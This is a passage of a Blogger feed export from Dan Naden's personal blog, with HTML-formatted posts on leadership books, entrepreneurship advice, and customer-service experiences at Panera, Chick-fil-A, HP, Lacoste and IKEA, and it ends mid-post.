It's typical for a GDB expression parser to be able to parse either an expression or a type. This often introduces ambiguity into grammars that did not previously exist (though this can be worked around with a special start state, followed by parsing the same token stream two different ways). This is used to make ptype TYPE work. Unfortunately there is no way for your parser to know whether it has been called from ptype or some other command.
The parser API has special support for field name completion. This support makes it so that pressing tab will narrow the list of completions to just members of an aggregate object. See mark_struct_expression and parse_completion.
Add any evaluation routines, if necessary
If you need new opcodes (that represent the operations of the language), add them to std-operator.def. Add support code for these operations in the evaluate_subexp function defined in the file eval.c. Add cases for new opcodes to prefixify_subexp, operator_length_standard, print_subexp_standard, and dump_subexp_body.
You can also make the new operators specific to your language, by writing local variants of these functions (that delegate most cases to the standard versions); and by adding a struct exp_descriptor to your language implementation. You can also override standard operators this way -- most commonly by redefining the semantics of a particular operator, but also even changing the layout in struct expression.
"Maybe" tasks
There are some tasks that you may or may not have to do, depending either on how your language works, or how close it is to some language that GDB already supports.
It's not unusual to have to modify the DWARF reader beyond merely adding support for a language tag.
- If your language uses a module hierarchy, you may want to encode this information into the symbol names generated by GDB. This requires modifying the DWARF reader.
- If your language supports types that aren't already available in GDB, you may need:
- To modify the DWARF reader to add such types;
- To add new GDB type codes to represent the types; or
To add a new enum type_specific_kind constant and update associated types (especially union type_specific) to encode information specific to your language
It's possible your language may even require deeper changes to GDB. Whatever those might be, they are outside the scope of this document.
|
http://sourceware.org/gdb/wiki/Internals%20Adding-a-Source-Language-to-GDB
|
CC-MAIN-2017-13
|
refinedweb
| 1,554
| 63.19
|
Hi all!
I have a program that runs as a large form (Form1) with smaller forms that open inside of it (PeopleBox). It's for friends/contacts - each person gets their own row in the database (PeopleDB). At runtime I'd like it to open a PeopleBox for each person already existing inside the DB.
I've managed to get it to open a PeopleBox for each row in the DB, but each box is showing the information for the first row only (rather than cycling through the rows). I'm sure I need a foreach statement, but I'm unsure how to phrase it. Any help would be greatly appreciated!
Code below:
using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Data.SqlServerCe; namespace MaryAnne { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { // DB connection string fileName = "PeopleDB.sdf"; string connectionString = string.Format("DataSource=\"{0}\";", fileName); // SQL Command string sql = "select * from PeopleTable"; SqlCeConnection cn = null; try { cn = new SqlCeConnection(connectionString); SqlCeCommand cmd = new SqlCeCommand(sql, cn); // Checking to make sure no concurrent connections exist if (cn.State == ConnectionState.Open) cn.Close(); // Opening the connection cn.Open(); SqlCeDataReader scdr = cmd.ExecuteReader(); while (scdr.Read()) { // Opening a PeopleBox for each row in the DB PeopleBox childForm = new PeopleBox(); childForm.MdiParent = this; childForm.Show(); } scdr.Close(); } catch (Exception ex) { MessageBox.Show(ex.Message); } finally { if (cn != null) cn.Close(); } } } }
The relevant bit of code is:
while (scdr.Read()) { // Opening a PeopleBox for each row in the DB PeopleBox childForm = new PeopleBox(); childForm.MdiParent = this; childForm.Show(); }
I know that the while statement is where I'm going wrong. I'm just not having any luck with foreach statements - everything I've tried has thrown up a series of errors.
Thanks for reading!
-MaryAnne
|
https://www.daniweb.com/programming/software-development/threads/323947/sql-query-foreach-row
|
CC-MAIN-2017-17
|
refinedweb
| 317
| 53.78
|
C API: Encapsulates information about a currency. More...
#include "unicode/utypes.h"
#include "unicode/uenum.h"
Go to the source code of this file.
C API: Encapsulates information about a currency.
The ucurr API encapsulates information about a currency, as defined by ISO 4217. A currency is represented by a 3-character string containing its ISO 4217 code. This API can return various data necessary the proper display of a currency:
The
DecimalFormat class uses these data to display currencies.
Definition in file ucurr.h.
Selector constants for ucurr_getName().
Selector constants for ucurr_getName().
Definition at line 92 of file ucurr.h.
Returns the number of the number of fraction digits that should be displayed for the given currency.
This is equivalent to ucurr_getDefaultFractionDigitsForUsage(currency,UCURR_USAGE_STANDARD,ec);.
Returns the display name for the given currency in the given locale.
For example, the display name for the USD currency object in the en_US locale is "$".
Returns the plural name for the given currency in the given locale.
For example, the plural name for the USD currency object in the en_US locale is "US dollar" or "US dollars".
Returns the rounding increment for the given currency, or 0.0 if no rounding is done by the currency.
This is equivalent to ucurr_getRoundingIncrementForUsage(currency,UCURR_USAGE_STANDARD,ec);
Queries if the given ISO 4217 3-letter code is available on the specified date range.
Note: For checking availability of a currency on a specific date, specify the date on both 'from' and 'to'
When 'from' is U_DATE_MIN and 'to' is U_DATE_MAX, this method checks if the specified currency is available any time. If 'from' and 'to' are same UDate value, this method checks if the specified currency is available on that date.
Unregister the previously-registered currency definitions using the URegistryKey returned from ucurr_register.
Key becomes invalid after a successful call and should not be used again. Any currency that might have been hidden by the original ucurr_register call is restored.
|
http://icu-project.org/apiref/icu4c/ucurr_8h.html
|
CC-MAIN-2018-05
|
refinedweb
| 325
| 50.43
|
Designing Reusable:
If you would like to receive an email when updates are made to this post, please register here
RSS
Some things I'd like some clarification on down the line:
1) where to declare LINQ expressions for best performance vs. readability (make it a readonly so it gets parsed to Expression once or declare it where it's used so it's easier to work with)
2) Naming lambda parameters (examples almost exclusively use x, y, etc., but as they are parameters, is this just due to newness or is naming relaxed when the method is anonymous inline?
3) Can LINQ (specifically LINQ to Objects) be overused in frameworks? (right now, I go by the "finite loop means use old-style constructs; variable/concurrent loop means LINQ", but what does MS say here?)
4) Declaring multiple sub-LINQ variables to build a large nested one vs. one variable to store the whole thing (reuse plays into this, as does readability, as does performance...I tend to only declare variables if I reuse the memory, others don't. With LINQ being potentially used to create very large structures, how does this change?
This is really good news. I am really looking forward to reading it.
Excellent news!
Damn it, I just bought the first one!
Krzysztof spilled the beans ... We just started working on Volume 2 of the Framework Design Guidelines...
Krzysztof spilled the beans ... We just started working on Volume 2 of the Framework Design Guidelines
This is just awesome news. Now, where do we apply for early review copies? ;-)
No. Seriously :-)
This is fantastic news! I can't wait. Like Tom K-G, I too volunteer for review duties. I gave you a decent amount of feedback on the 1st ed, but that was after publication.
Some specific points:-
1) I don't think the title "Framework Design Guidelines" does the book justice. Your guidelines are *not* just for reusable .NET libraries. The book should be read by every .NET developer, not just framework designers. I think of FDG as "Effective .NET". Is it too late to change the title to reflect/promote its wider appeal?
2) It would be nice to have some guidance on multi-threading, including: lock attempts that timeout, the volatile keyword, CPU cache lines, the SynchronizationContext class, the CallContext class, and more.
3) Memory: include guidance on weak references, SafeHandles over finalizers, etc.
4) Cross-language gotchas, such as VB's exception filtering code being invoked before the exception-throwing C# code's finally block has run.
5) Transactions. Include guidance on the goodness that's available in System.Transactions.
6) And of course I look forward to as much C# 3.0 guidance as you can give.
Andrew
I have the first one, I won't get a second version, but I would consider it if the chapters that deal exclusively with new stuff in .NET 3.0 and 3.5 would be released separately.
Great news, I'm really looking forward to the new edition.
I don't want to start a naming convention war, but you should define conventions for private members.
Developers often work on several teams and use tools to validate naming conventions. Having to reconfigure your tools and your mind when you change projects is a pain.
BTW, I hate prefixing a member just because it's private.
How about some discussion about how tio deal with covariant collections? I.e., something like
DoSometingWithItems<T>(IEnumerable<T> stuff) where T : SomeBaseClass
I've seen way too many people assume that they need to specify IEnumerable<SomeBaseClass> as the parameter and run into all sorts of issues with getting collections of derived types to work. It looks obvious but it's something that people easily mess up.
Also, advice about implementing IEquatable<T> within an inheritance hierarchy would be nice.
For example, I have IMyInterface, MyClass : IMyInterface and MyDerivedClass : MyClass.
I want to implement IEquatable on the interface but I want to ensure that EqualityComparer<T>.Default uses the methods even if someone uses MyClass or MyDerivedClass as the type params.
Advice on how to implement the interface at each level and dealing with the various Equals overrides would be very helpful.
Hi Krzysztof, great news.
Not sure if this is appropriate for the book, but I'd really like to find some 'canonical' documentation on use scenarios for LINQ, the ASP.NET Dynamic Data Controls and when to use SQL Metal directly. Additionally, I'd like to find out the limitations of these code gen approaches and when its best to continue to write code by hand (what are the upper limits of their customizability?). Also, performance patterns for LINQ -- how often should we create instances of data Context objects, can you cache them, creat singletons (gasp), etc
From the first edition, I loved the comments made by PM's/Devs on the framework, what they should have done, what could be done better, etc. Make sure that type of thing gets into the new stuff! <g>
I vote for WPF guidelines. With WPF there are 10x as many ways to solve problems than plain .NET. This means there are 10x as many ways to shoot yourself in the foot. How about 10x as many guidelines for the WPF side of things? :)
Some best practices on designing libraries that have extension methods would be good.
Hi!
It would be great to see a chapter for Model-View-ViewModel WPF pattern.
Kazi
Thanks for all the support, comments, and suggestions. Some of the things are already on the list, some are great new suggestions. The topics we want to avoid are all that are not related to API surface area design. We want to keep the book focused and be the definitive source of information on API design; we will never succeed at being the definitive source for information about everything related to .net development. Having said that I am dreaming about writing something like Framework Architectural Guidelines (layering, dependencies, threading, etc.), so maybe one day all of these suggestions will find their way into a Framework guidance book.
Mike, I have already made some updates to the manuscript inline (comments and errata items from readers) and clarifications to some existing guidelines, but majority of the new content will be easily identifiable and separated. I don’t think we will have many new chapters, but definitely many new sections in existing chapters and based on your feedback I will add a list of added sections to the front matter. Thanks for the feedback.
Paulo, naming conventions for private/internal identifiers is something that many people ask. There is an appendix in the book that talks about these. Having said that, I prefer for these to keep being informal as I also don’t want to get into internal team naming wars :-) Public identifiers are a different ball game; they affect productivity of people outside of the internal dev team (and that’s the main focus of the book).
Oh, for those who would like to review the manuscripts, please send me email (kcwalina at microsoft.com) expressing interest and with a premission to forward it to the publisher.
And Thanks! Feedback from people passionate about API design is invaluable!!!
Also, I just updated the picture of the cover to reflect Anders's change in the title.
Here's another one (that I'm sure will tick off some folks): less special sections on Visual Basic. Seems like MS always gives VB special attention, even in terms of it being a more "complete" .Net implementor than C#, but in terms of API design, there's a disproportionally large amount of annotations related to VB in what should be, by and large, a language neutral platform.
Krzysztof and Brad have announced they are working on the second edition of the awesome Framework Design
Krzysztof spilled the beans ... We just started working on the 2nd edition&;of the Framework Design
Guidance for data access to determine when to use LINQ, ADO.NET, Entity Framework, typed DataSets, etc in different scenarios would be useful. Given all of the data access options, even alternet options like SubSonic and nHibernate, it is getting harder to maintain legacy applications that choose all kinds of unexpected approaches. It appears that LINQ data contexts will replace typed DataSets, but a prescribed approach given all of the available options would be very useful over the next several years.
The new Async-Pattern (Event-based Asynchronous Pattern) in the .NET Framework 2.0 used for classes System.Net.WebClient, System.Net.NetworkInformation.Ping, System.ComponentModel.BackgroundWorker etc. (Not BeginnXXX and EndXXX but that XXXAsync, XXXAsyncCancel)
There are many naming conventions for classes, events and methods in this Pattern.
You know that I'm a big fan of framework and library design so also have been a big fan of Framework
First I would like to thank you (and Brad Adams) for writing this very essential book.
About the 2nd edition, I would really like to see more guidelines on how to organize your types in a namespace hierarchy and on how to package these same types into different assemblies. Even though the two concepts really are quite unrelated and orthogonal, they often get mistakingly intermingled. So it would be really helpful to have guidelines to help you to think straight when performing these tasks.
I hope you keep the book focused on core parts of the framework and stay away from areas such as WPF, Card Space, silverlight.
These guidelines were just added as part of an update to the Framework Design Guidelines book ( upcomming
Krys and I just finished writing the update to the framework design guidelines and you are can already
I just bought early verison at the Rough Cuts
Looks like a greta outline. Stick with it.
[ Nacsa Sándor , 2009. január 19. – február 5.] Ez a Team System változat fejlett eszközrendszert kínál
Add a chapter or section devoted to service or WCF-related API guidelines.
|
http://blogs.msdn.com/kcwalina/archive/2008/01/03/FrameworkDesignGuidelines2ndEdition.aspx
|
crawl-002
|
refinedweb
| 1,670
| 63.29
|
First you must import the classes for the library via:
import com.ormlite.*;
Next you must load your mapping files. You can load a file directly like this:
ORM.loadFile( "c:/myfile.xml" );
or if the mapping file is on your classpath you can do this:
ORM.loadResource("mappings/mymap.xml");
Next you must set up one or more data sources. They are referred to by name in the <data> mapping element(explained below). If one is not specified the default mapping is used which is named default.
You set them with the setDataSource method:
ds = new DataSource(...);
ORM.setDataSource( "mysource", ds );
You can set the default datasource like:
ORM.setDataSource(ds);
This is the datasource which will be used if one is not specified for a <data> mapping element.
If you are using spring a class called ORMConfig is supplied which will make setting up the ORM easy. The following methods are provided:
setDataSources( Map sources );
setMappingFiles( Properties files );
setResourceFiles( Properties files );
Here is a sample XML snippet showing how to use the class:
<!-- Example of configuring ORMLITE using Spring IOC framework -->
<beans>
<bean id="myDataSource" class="com.foo.bar.DataSource">
...
</bean>
<bean id="dataSourceDeux" class="com.foo.baz.DataSource>
...
</bean>
<bean id="ormLoader" class="com.ormlite.ORMConfig">
<property name="dataSources">
<map>
<prop key="default" ref="myDataSource" />
<prop key="other" ref="dataSourceDeux" />
</map>
</property>
<property name="mappingFiles">
<values>
mappingfileA.xml
mappingfileB.xml
</values>
</property>
<property name="resourceFiles">
<values>
classPathFile.xml
</values>
</property>
</bean>
</beans>
There are static methods in the com.ormlite.ORM class which allow Create, Read, Update and Insert. These methods refer to <data> definitions by Java class or by name.
All queries against a datasource use the Query class, which also refers to <data> definitions by Java class or name.
The preferred method to write to the database is to use the BaseRecord class to extend your objects, which has the same functionality added via inheritance(mixin).
Once data definitions are loaded, you can load all the records in a table via:
List items = ORM.findAll( "Datatype" );
or
List items = ORM.findAll( MyRecord.class );
If you wish to load specific items you create a Query object like this:
Query q = new Query( MyRecord.class ); // specify by class
Query q = new Query( "MyRecord" ); // specify by name
or using the ORM class:
Query q = ORM.find( "MyRecord");
This method is easier when chaining method calls(see below).
A Query object has a where method which allows conditions to be added to the query:
q.where("id = :myvar")
Note that a variable was used in the clause using a colon prefix. You should not use values directly in the where clauses to avoid SQL Injection vulnerability. Literals can also cause problems for ormlite when creating select clauses from multiple tables.
A note on column/field references
When you add conditions to your queries, you should refer to values by either:
It is preferred you use one of the first two options, as the third option could cause confusion in some circumstances. (Not to mention the first two are much clearer)
So if you have a data definition like this:
<data name="Foo">
<table name="Bar">
<field type="string" name="baz" column="baz1" />
</table>
</data>
You could use:
q.where("Foo.baz = :myvar")
or
q.where("Bar.baz1 = :myvar")
Variable values
A Query object contains a set of variable bindings. They can be set directly:
q.set( "myvar", new Integer(100) ); (new not needed with 1.5+ autoboxing)
you can also set the SQL type directly:
`q.set( "myvar", java.sql.Types.NUMERIC, 100 );
If you have a Map of bindings you can pass it in the where clause also:
Map myvars = new HashMap();
myvars.put( "myvar", new Integer(100) );
q.where("id= :myvar", myvars );
In Groovy its even easier:
q.where( "id = :myvar", [ 'myvar' : 100 ] )
Once the Query is configured, you can retrieve all records using the all method:
List items = q.all();
Or if you need a subset of records you can use the first and from methods:
List items = q.first( 100 );
List items = q.from( 100, 200 );
Or if you need just the first element:
Object item = q.first();
Note that the query object methods return itself so chaining calls makes for simple API calls:
Foo foo = (Foo)ORM.find("Foo").where("id = :myid", binds ).first();
Writing records are very easy. Create an object you wish to store, ensuring that all the key fields are set. Then call:
ORM.insert( object );
The data definition is found using the class of the passed object. If you have multiple data definitions using the same class the data definition cannot be found using the type alone. In this case you need to pass the name of the data definition:
ORM.insert( "MyRecord", object );
The only caveat is that primitive types(int,float..) will always be written, since they cannot be set to null. For this reason I suggest you use non-primitive types when possible.
Deleting or Updating records are also quite easy.
Again the data definition is found using the class of the passed object and the key fields cannot be null.
Again, if you have multiple <data> definitions sharing the same class the name of the data definition name must be passed in:
ORM.delete( "MyRecord", object );
If you extend your Java Bean from class com.ormlite.BaseRecord, you get the following methods which will simplify updating the database.
The restriction above still applies to the use of BaseRecord: The class must map to only one <data> definition. In this case if you wish to reuse a class, you must extend it with an empty class declaration:
class MyRecord extends BaseRecord { .... }
class MyRecordToo extends MyRecord {} // same class, different data definition
If you have child objects specified in your XML file, you can load them using the following BaseRecord methods:
List findChildren(Class cls);
List findChildren(String name);
These two methods will find the child using the name or Java class and load any child objects using the keys specified in the XML.
public void loadAllChildren();
This method will load all children specified in the XML and store the results in the appropriate java class members. If the mapping is one to one, the set method must accept an appropriate java object. If the mapping is one to many, the method must accept a subclass of java.util.List.
int deleteChildren(Class cls);
int deleteChildren(String name);
These methods will delete the children using the <child> node in the XML which matches the name or class passed in. Both return the number of records deleted.
|
http://code.google.com/p/ormlite/wiki/API
|
crawl-002
|
refinedweb
| 1,097
| 65.42
|
tag:blogger.com,1999:blog-53124109493051555322009-07-13T20:34:47.206-07:00Naden's CornerDan Naden brings us a special place where we will all learn to be better leaders, professionals, and helpers in this collaborative era. This blog is authored by Dan Naden. <a href="mailto:dnaden@yahoo.com">E-mail me</a>.Dan Naden Kawasaki’s Ten Entrepreneurial Secrets<a href=""><img id="BLOGGER_PHOTO_ID_5358153806354592466" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 133px" alt="" src="" border="0" /></a>Are you an entrepreneur who is trying to establish and differentiate your business?<br /><div><br />Or maybe you are a corporate executive looking to grow your business and cultivate motivated, successful employees? </div><div><br />In either scenario, you should drop everything NOW and read this fabulous article from Guy Kawasaki, author, consultant, and venture capitalist. </div><div><br /><a href=""></a><br /><br /><strong>Significant keys</strong>:<br />· Powerpoint: No more than 10 slides when making your pitch to VCs.</div><div><br />· Niche: Kawasaki has a unique approach to finding your personal value or your business’ value. </div><div><br />· Mission statements are dead: He says: “Define yourself by what you want to mean to consumers.”</div><div><br />This is good reading. </div><br /><div></div><br /><div>Until next time,<br /><br />Dan Naden</div><div>Naden's Corner</div><div> </div><div><span style="font-size:78%;">Photo Source: </span><a href=""><span style="font-size:78%;"></span></a></div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden Bread: Escape from Grease Burgers<a href=""><img id="BLOGGER_PHOTO_ID_5355560092574447058" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 150px" alt="" src="" border="0" /></a>The family and I recently had a pleasant experience at <a href=""><span class="blsp-spelling-error" id="SPELLING_ERROR_0">Panera</span> Bread</a>. Easily forgotten compared to <a href="">Burger King</a>, <a href="">McDonald’s,</a> <a href="">Subway</a>, and <a href=""><span class="blsp-spelling-error" id="SPELLING_ERROR_1">Quiznos</span></a>, <span class="blsp-spelling-error" id="SPELLING_ERROR_2">Panera</span> Bread could easily establish itself with a healthy, hearty menus of sandwiches, salads, and soups.<br /><div><br />This chain, established in 1993 as the former Au <span class="blsp-spelling-error" id="SPELLING_ERROR_3">Bon</span> Pain Co., sits itself apart from the litany of ‘fast-food’ joints in the following ways:<br />· <strong>Healthy</strong>: a 2008 Health magazine study named <span class="blsp-spelling-error" id="SPELLING_ERROR_4">Panera</span> Bread America’s healthy fast food restaurant.<br />· <strong>Convenient</strong>: There are only a couple of <span class="blsp-spelling-error" id="SPELLING_ERROR_5">Panera</span> Bread location in my market (Austin, Texas), but there are over 1,266 throughout the US and Canada. A big win: Free <span class="blsp-spelling-error" id="SPELLING_ERROR_6">Wi</span>-<span class="blsp-spelling-error" id="SPELLING_ERROR_7">fi</span> makes <span class="blsp-spelling-error" id="SPELLING_ERROR_8">Panera</span> more of a hang-out place compared to like-minded competitors.<br />· <strong>Store layout</strong>: At the location I visited, the majority of the seating is purposely ‘away’ from the order, pick-up and drink stations. The usual commotion around those activities are a restaurant is pleasantly irrelevant at <span class="blsp-spelling-error" id="SPELLING_ERROR_9">Panera</span> Bread.<br /><br />One area of concern: Despite the nice atmosphere and tasty food, I thought the portion size could have been a bit more generous. </div><div><br />Check it out and let me know what you think.<br /></div><div>Until next time, </div><br /><div></div><br /><div>Dan <span class="blsp-spelling-error" id="SPELLING_ERROR_10">Naden</span><br /><span class="blsp-spelling-error" id="SPELLING_ERROR_11">Naden's</span> Corner </div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden Soccer Plays at an Elite Level<a href=""><img id="BLOGGER_PHOTO_ID_5352941096231609026" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 133px" alt="" src="" border="0" /></a>A silent few probably saw some of the best soccer played by a <a href="">US team </a>in a long time on Sunday afternoon. Unfortunately, the second half brought out a ferocious <a href="">Brazilian side </a>that was not to be denied the <a href="">Confederations Cup</a> for the 2nd year in a row.<br /><div><br />The US lost 3-2 to the creative and ultra-talented Brazilians, but they displayed a team-first, cohesive effort that the US rarely displays on the international level.<br /><br />Kudos to Bob Bradley and team for their:<br /><strong>Athleticism</strong>: They looked like the fitter team for most of the night, yet the Brazilians played smarter and more opportunistic soccer, especially in the 2nd stanza.<br /><br /><strong>Execution</strong>: The Americans converted on their chances in the 1st half, but the 2nd half was devoid of scoring opportunities. Conversely, Brazil weaved through the US defense for many 2nd half chances.<br /><br /><strong>Communication</strong>: To succeed against the Brazilians, a team must communicate relentlessly. The defense looked solid and tight, but Brazil got into a rhythm that wore the US side down as the night grow longer. </div><div><br />So I ask you? </div><div><br />Why do you or don’t you watch soccer, the world’s most popular sport? Let’s get a discussion going.</div><br /><div></div><br /><div>Until next time, </div><div>Dan Naden</div><div>Naden's Corner</div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden: You are the Message<a href=""><img id="BLOGGER_PHOTO_ID_5336515894058725426" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 150px; CURSOR: hand; HEIGHT: 200px" alt="" src="" border="0" /></a>I am chewing through Roger Ailes' classic, 'You are the Message'. I highly recommend this book to anyone who's concerned about making an impact with their communication at work or home. Isn't that pretty much everyone?<br /><br /><div>Most importantly, I've learned the importance of being like able. This isn't being a 'Yes man'. You can have all the pedigree, experience, and skills in the world, but if you don't possess character, trust, and integrity your message will lose its appeal. </div><br /><div>Ailes cites numerous examples of seasoned execs who fail to motivate, inspire, and drive results from the troops because they lack the like ability factor. </div><br /><div>Pick up your copy of 'You are the Message' today. </div><br /><div>Until next time, </div><br /><div>Dan Naden</div><div>Naden's Corner</div><br /><div></div><br /><div></div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden: A Brand on the Rebound<a href=""><img id="BLOGGER_PHOTO_ID_5334395935153101314" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 150px" alt="" src="" border="0" /></a>Moms are special. I truly believe that the job of 'Mom' is the toughest in the world. To celebrate the 'Mom' in our household, I bought my wife a nice shirt from the <a href="">Lacoste</a> store in <a href="">the Domain </a>shopping complex in Austin, Texas.<br /><div></div><br /><div>This wasn't such a remarkable event (except for the smile on my wife's face), yet my interaction with the friendly manager on duty, Mario, was extraordinary. </div><br /><div>Mario and I started conversing about the Lacoste brand. I remember the Izod-Lacoste brand being 'front and center' in the mid-80s. Mario had me captivated as he told about his meetings with the Lacoste CEO in France, the rise and fall of the Lacoste brand, and their current path back to prominence. It appears that Lacoste is taking a very measured, cautious approach to growth -- something Starbucks should have embodied years ago. Lacoste won't fail because its supply outstrips its demand.</div><br /><div><strong>Lessons</strong>: Be interested in the passions of others - you never know what interesting stories and experience you'll hear. And don't forget about the greatness of Moms everywhere. </div><br /><div>Good luck to Lacoste!</div><br /><div>Happy Mother's Day</div><br /><div>Dan Naden<br /><br />Until next time, </div><div>Naden's Corner</div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden: Not your typical fast food experience<a href=""><img id="BLOGGER_PHOTO_ID_5317322414589333762" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 133px; CURSOR: hand; HEIGHT: 200px" alt="" src="" border="0" /></a>My family and I visited the local <a href="">Chick-Fil-A</a> last weekend. I thought the visit was to be your routine, expected fast food stop: noisy, smelly, unfriendly, and impersonal.<br /><br />Within two minutes of walking through the Chick-Fil-A doors, however, I knew this was to be a different time.<br /><br />The wait staff behind the counter seemed genuinely interested to see us and take our order on a partly-cloudy Sunday afternoon. I’ve been to many fast food joints where the wait staff is either half-asleep or angry at the world.<br /><br />Upon completion of our order, I was told by a friendly young lady, “grab a seat; we will bring your food to your table.” Huh? Did I hear that right? A fast food place was bringing food to my table?<br /><br />The place was buzzing on this Sunday afternoon. It looked like many others had the same idea. My family and I settled into a cozy booth next to the window and watched the many other families enjoying themselves.<br /><br />Within a few minutes, the same friendly young lady (her name was Reagan) brought our food to the table. What service!! During the course of our meal, she returned to our table at least 4 times to check in and say, “Is there anything else I can get for you?”<br /><br />After a thoroughly enjoyable meal, I thanked this young lady for her hospitality. She responded with a phrase you just don’t hear too much anymore: “My pleasure.” Talk about refreshing.<br /><br />This lady and the rest of the Chick-Fil-A staff could have been chosen to be grumpy, rude, and distant. It was special to see that they had taken the opposite approach. They were thrilled to serve the many guests with a smile. <a href="">Burger King</a>, <a href="">Wendy’s</a> and <a href="">McDonald’s</a> beware; there’s a new sheriff in town that really puts people first.<br /><div></div><br /><div>Until next time, </div><br /><div>Dan Naden</div><br /><div></div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden’s Customer Service Scores Big<a href=""><img id="BLOGGER_PHOTO_ID_5313132578154228258" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 133px" alt="" src="" border="0" /></a>I’ve owned a <a href="">HP</a> Laptop for a few years now. Outside of a few minor glitches, the laptop has worked like a charm; it’s been a true joy to create, solve problems, communicate, and analyze with my laptop’s assistance.<br /><br />The other day, however, I thought this utopia was about to come crashing down. The left-hinge on my laptop had become seriously dislodged to the point where closing the laptop was not an option.<br /><br />Losing my laptop for weeks at a time to be fixed was not something that I looked forward to for one second – not to mention the dollars that would come out of my wallet. This was going to be beyond a minor inconvenience. I browsed the HP site looking for a customer support phone number when I stumbled upon details on the very issue that plagued me – broken left hinge.<br /><br />It turns out that a broken left hinge has been a MASSIVE problem for owners of my particular model of HP laptop. This was such a big issue that HP was offering free fixes for anyone affected. Are you serious?<br /><br />I called the tech support number that was provided and spoke with a very nice, apologetic gentleman about this issue. Yes, it was true; this fix was to be resolved at no charge to the consumer. (Note: Never tear down someone from tech support; they’ve been beaten down relentlessly; give them a break and show some respect.)<br /><br />Within 48 hours, I had received my shipment box from HP. I quickly packed my computer up and sent it back to HP. As I heard the FedEx truck speed away from my house, my expectations were that I would not see my computer again for at least 2 weeks.<br /><br />Surprise! My computer arrived back at home in 3 days; and my issue was fixed.<br /><br />Talk about exceeding my expectations. I’ll raise a big cheer for HP for turning a potentially huge catastrophe into something that I’ll tell my friends about for quite a long time.<br /><br />Have you had a remarkable or 'not so remarkable' customer service experience? Share it with us.<br /><br />Until next time,<br /><br />Dan Naden<br />Naden's Corner<div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden to Stick: Read it and be changed<a href=""><img id="BLOGGER_PHOTO_ID_5303497327570218546" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 200px" alt="" src="" border="0" /></a>A single businessman sits alone in a hotel bar when a beautiful woman approaches and offers him a drink. The two share conversation, laughs, and a few stories and then everything vanishes. This is the last thing the businessman remembers before….<br /><br />He groggily wakes up in a bathtub fills with ice. Immediately in front of him next to the tub are a cell phone and a note. The note says in scribbled, bright red ink: ‘Don’t Move. Use this phone to call 911!’<br /><br />The confused, disoriented businessman dials 911 explains the bathtub, note, and cellphone and asks the operator to help her make sense of all of this madness. The operator says: “Are you in a bathtub filled with ice? Is there a tube coming out of your back?” The businessman looks behind him to notice a cylinder protruding out of his back. A knifing pain shoots through this body. “Yes, there is a tube,” the businessman responds.<br /><br />“I am sorry sir, but you’ve been drugged and a kidney has been removed from your body; I’ll have 911 on the scene immediately. Don’t move – just stay in the tub. This is the 10th call I’ve received like this in the past month.”<br /><br />Have you heard this one before? This urban legend has been bouncing around for decades. First of all, this is not truth, but the power of its vivid imagery and ability to captivate is real.<br /><br />The takeaway: Use stories to convince, persuade, and inform. Don’t just rely on statistics, disconnected anecdotes, or a laundry list of suggestions to be remembered.<br /><br />Want more real-world examples of how to make ideas stick? Check out ‘<a href="">Made to Stick</a>’ by Dan and Chip Heath.<br /><br />I just read it and it comes <a href="">highly recommended</a>.<br /><br />Until next time,<br />Dan Naden<br />Naden's Corner<div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden Simplest Toy Instructions Ever<img id="BLOGGER_PHOTO_ID_5300166577728922482" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 200px" alt="" src="" border="0" />I am all about simplicity. Simplicity in form AND function. Simplicity that's profound is even more captivating.<br /><br /><div>This simplicity is ever more rewarding when it comes in the form of instructions. </div><br /><div>With Christmas still somewhat fresh in our minds, we may have come face-to-face with toy or digital electronics instructions. Collective groan emanates from the audiences; headaches appear. </div><br /><div>We've all seen this scenario on TV or in the movies. Young kid excitedly opens up a toy only to realize that the fun won't commence until the toy is put together. The parent enters the scene and begins to construct the point of the child's affection. </div><br /><div>Unfortunately, the toy's instructions are excruitangly painful and overdone. The focus of the instructions are on text, not clean, concise imagery and pictures. The parent works well into the night on the toy while the child sullenly falls asleep. </div><br /><div>It wasn't this way in our household this past Christmas. We open the '<a href="">MULA</a> Bead Roller Coaster' from <a href="">IKEA</a>, the brilliant store with marvelous products at every turn. I've marveled at the directness and understandability of the instructions. </div><br /><div>Within minutes, our little boy was connecting with his new toy. Toy product manufacturers take note: keep it simple and you'll get more 'free' advertising like this!! </div><div><br /> </div><div></div><div>Until next time, </div><div>Dan Naden</div><div>Naden's Corner</div><div></div><div><span style="font-size:78%;">(Image credited to Ikea -- thanks.)</span> </div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden real and authentic with your voice<a href=""><img id="BLOGGER_PHOTO_ID_5282726471661870722" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 150px" alt="" src="" border="0" /></a>OK, I stepped outside the box on this final ‘non-verbal’ tip. This tip is verbal, but extremely essential as you work towards effective communication.<br /><br />We’<span class="blsp-spelling-error" id="SPELLING_ERROR_0">ve</span> all been there a thousand times.<br /><br />You are mired in a company meeting or small group session and you mindlessly 